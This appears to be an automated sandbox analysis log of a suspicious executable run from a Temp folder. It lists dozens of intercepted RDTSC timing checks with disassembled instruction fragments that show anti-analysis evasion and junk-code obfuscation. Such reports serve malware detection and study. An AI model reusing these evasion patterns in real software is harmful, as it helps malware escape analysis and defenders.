Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53C0E85 second address: 53C0EB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F34D94219E6h 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov bx, si 0x00000016 mov esi, 577D452Fh 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53C0EB8 second address: 53C0ED6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53600ED second address: 536012D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F34D94219DDh 0x0000000b and esi, 0DF073E6h 0x00000011 jmp 00007F34D94219E1h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push dword ptr [ebp+04h] 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F34D94219DDh 0x00000024 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 536012D second address: 5360133 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5360133 second address: 5360137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5360137 second address: 536013B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 536013B second address: 536016D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov esi, 484073F7h 0x00000013 pushfd 0x00000014 jmp 00007F34D94219DCh 0x00000019 sbb si, C9E8h 0x0000001e jmp 00007F34D94219DBh 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 536016D second address: 5360173 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5360173 second address: 5360177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5380CA4 second address: 5380CC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F34D8F44CC0h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5380CC8 second address: 5380CD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5380CD7 second address: 5380CF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F34D8F44CBFh 0x00000008 push eax 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f mov si, di 0x00000012 push ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5380CF6 second address: 5380D25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 jmp 00007F34D94219DFh 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F34D94219E5h 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5380D25 second address: 5380D35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D8F44CBCh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5380D35 second address: 5380D6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F34D94219E8h 0x00000011 jmp 00007F34D94219E2h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5380865 second address: 5380869 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5380869 second address: 538086F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 538086F second address: 5380885 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D8F44CC2h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5380885 second address: 53808F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F34D94219E6h 0x00000011 push eax 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F34D94219E1h 0x00000019 and ah, FFFFFF86h 0x0000001c jmp 00007F34D94219E1h 0x00000021 popfd 0x00000022 mov ch, 5Ch 0x00000024 popad 0x00000025 xchg eax, ebp 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F34D94219E6h 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53807B6 second address: 5380833 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F34D8F44CBFh 0x00000009 jmp 00007F34D8F44CC3h 0x0000000e popfd 0x0000000f movzx ecx, bx 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push ebx 0x00000016 jmp 00007F34D8F44CC0h 0x0000001b mov dword ptr [esp], ebp 0x0000001e jmp 00007F34D8F44CC0h 0x00000023 mov ebp, esp 0x00000025 jmp 00007F34D8F44CC0h 0x0000002a pop ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F34D8F44CC7h 0x00000032 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5380590 second address: 5380594 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5380594 second address: 53805B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5390392 second address: 53903AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53903AB second address: 53903B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53C0D93 second address: 53C0E0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F34D94219DFh 0x00000009 sub eax, 3D21896Eh 0x0000000f jmp 00007F34D94219E9h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007F34D94219E0h 0x0000001b jmp 00007F34D94219E5h 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 push eax 0x00000025 jmp 00007F34D94219E1h 0x0000002a xchg eax, ebp 0x0000002b pushad 0x0000002c push eax 0x0000002d pushad 0x0000002e popad 0x0000002f pop ebx 0x00000030 push eax 0x00000031 push edx 0x00000032 mov eax, 29D0CFDBh 0x00000037 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53C0E0F second address: 53C0E4D instructions: 0x00000000 rdtsc 0x00000002 mov di, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov si, 9DAFh 0x0000000f pushad 0x00000010 mov si, F4C1h 0x00000014 jmp 00007F34D8F44CBEh 0x00000019 popad 0x0000001a popad 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F34D8F44CC7h 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53C0E4D second address: 53C0E53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A03E9 second address: 53A03EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A03EF second address: 53A0406 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D94219E3h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A0406 second address: 53A042D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov ax, 3469h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A042D second address: 53A0495 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F34D94219E4h 0x0000000c and ax, EF38h 0x00000011 jmp 00007F34D94219DBh 0x00000016 popfd 0x00000017 popad 0x00000018 push eax 0x00000019 pushad 0x0000001a call 00007F34D94219DFh 0x0000001f mov edi, esi 0x00000021 pop esi 0x00000022 pushad 0x00000023 mov eax, ebx 0x00000025 call 00007F34D94219E7h 0x0000002a pop esi 0x0000002b popad 0x0000002c popad 0x0000002d xchg eax, ebp 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 mov ebx, 134150C2h 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A0495 second address: 53A0505 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F34D8F44CC0h 0x00000010 mov eax, dword ptr [ebp+08h] 0x00000013 jmp 00007F34D8F44CC0h 0x00000018 and dword ptr [eax], 00000000h 0x0000001b pushad 0x0000001c jmp 00007F34D8F44CBEh 0x00000021 mov di, ax 0x00000024 popad 0x00000025 and dword ptr [eax+04h], 00000000h 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F34D8F44CC3h 0x00000030 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A0505 second address: 53A0521 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 803Ah 0x00000007 jmp 00007F34D94219DBh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A0521 second address: 53A0525 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A0525 second address: 53A052B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A052B second address: 53A0531 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A0531 second address: 53A0535 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A0535 second address: 53A0539 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53806DE second address: 53806E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53806E4 second address: 538070C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F34D8F44CC4h 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 538070C second address: 5380726 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b popad 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5380726 second address: 538072A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 538072A second address: 538072E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 538072E second address: 5380734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5380734 second address: 538073A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 538073A second address: 538073E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5390ED3 second address: 5390EEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D94219E4h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5390EEB second address: 5390EEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5390EEF second address: 5390F28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F34D94219E7h 0x0000000f pop ebp 0x00000010 pushad 0x00000011 call 00007F34D94219E4h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A0233 second address: 53A0237 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A0237 second address: 53A023B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A023B second address: 53A0241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A0241 second address: 53A0247 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A0247 second address: 53A0281 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e mov ebx, 37F9ED46h 0x00000013 pop edx 0x00000014 mov cl, D0h 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F34D8F44CC0h 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A0281 second address: 53A0285 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A0285 second address: 53A028B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A028B second address: 53A029C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D94219DDh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A029C second address: 53A02D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d jmp 00007F34D8F44CBCh 0x00000012 mov edx, ecx 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 jmp 00007F34D8F44CBCh 0x0000001c pop ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A02D9 second address: 53A02DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A02DD second address: 53A02E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53A02E3 second address: 53A02E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53C065B second address: 53C066F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D8F44CC0h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53C066F second address: 53C0721 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c jmp 00007F34D94219E6h 0x00000011 push eax 0x00000012 pushad 0x00000013 mov ebx, 6EF02304h 0x00000018 pushad 0x00000019 call 00007F34D94219E3h 0x0000001e pop esi 0x0000001f pushfd 0x00000020 jmp 00007F34D94219E9h 0x00000025 adc ch, FFFFFFA6h 0x00000028 jmp 00007F34D94219E1h 0x0000002d popfd 0x0000002e popad 0x0000002f popad 0x00000030 xchg eax, ecx 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007F34D94219DCh 0x00000038 or ecx, 2665AD48h 0x0000003e jmp 00007F34D94219DBh 0x00000043 popfd 0x00000044 movzx esi, bx 0x00000047 popad 0x00000048 mov eax, dword ptr [76FB65FCh] 0x0000004d jmp 00007F34D94219DBh 0x00000052 test eax, eax 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53C0721 second address: 53C0725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53C0725 second address: 53C0729 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53C0729 second address: 53C072F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53C072F second address: 53C07CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F354AF94BFFh 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F34D94219DEh 0x00000016 adc al, 00000008h 0x00000019 jmp 00007F34D94219DBh 0x0000001e popfd 0x0000001f movzx esi, di 0x00000022 popad 0x00000023 mov ecx, eax 0x00000025 jmp 00007F34D94219DBh 0x0000002a xor eax, dword ptr [ebp+08h] 0x0000002d jmp 00007F34D94219DFh 0x00000032 and ecx, 1Fh 0x00000035 jmp 00007F34D94219E6h 0x0000003a ror eax, cl 0x0000003c jmp 00007F34D94219E0h 0x00000041 leave 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F34D94219E7h 0x00000049 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53C07CA second address: 53C081D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d mov esi, eax 0x0000000f lea eax, dword ptr [ebp-08h] 0x00000012 xor esi, dword ptr [00A72014h] 0x00000018 push eax 0x00000019 push eax 0x0000001a push eax 0x0000001b lea eax, dword ptr [ebp-10h] 0x0000001e push eax 0x0000001f call 00007F34DD8D54D0h 0x00000024 push FFFFFFFEh 0x00000026 jmp 00007F34D8F44CBEh 0x0000002b pop eax 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f pushfd 0x00000030 jmp 00007F34D8F44CBCh 0x00000035 or esi, 7CAE6DE8h 0x0000003b jmp 00007F34D8F44CBBh 0x00000040 popfd 0x00000041 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53C081D second address: 53C08A2 instructions: 0x00000000 rdtsc 0x00000002 call 00007F34D94219E8h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a call 00007F34D94219DBh 0x0000000f call 00007F34D94219E8h 0x00000014 pop eax 0x00000015 pop ebx 0x00000016 popad 0x00000017 ret 0x00000018 nop 0x00000019 push eax 0x0000001a call 00007F34DDDB2260h 0x0000001f mov edi, edi 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F34D94219DCh 0x00000028 jmp 00007F34D94219E5h 0x0000002d popfd 0x0000002e movzx eax, di 0x00000031 popad 0x00000032 push esp 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F34D94219E2h 0x0000003c rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53C08A2 second address: 53C08A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53C08A6 second address: 53C08AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53C08AC second address: 53C08FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F34D8F44CC3h 0x00000009 adc eax, 4EEBD2AEh 0x0000000f jmp 00007F34D8F44CC9h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov dword ptr [esp], ebp 0x0000001b jmp 00007F34D8F44CBEh 0x00000020 mov ebp, esp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53C08FF second address: 53C0903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 53C0903 second address: 53C0920 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 5370078 second address: 537007C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: 537007C second address: 5370099 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
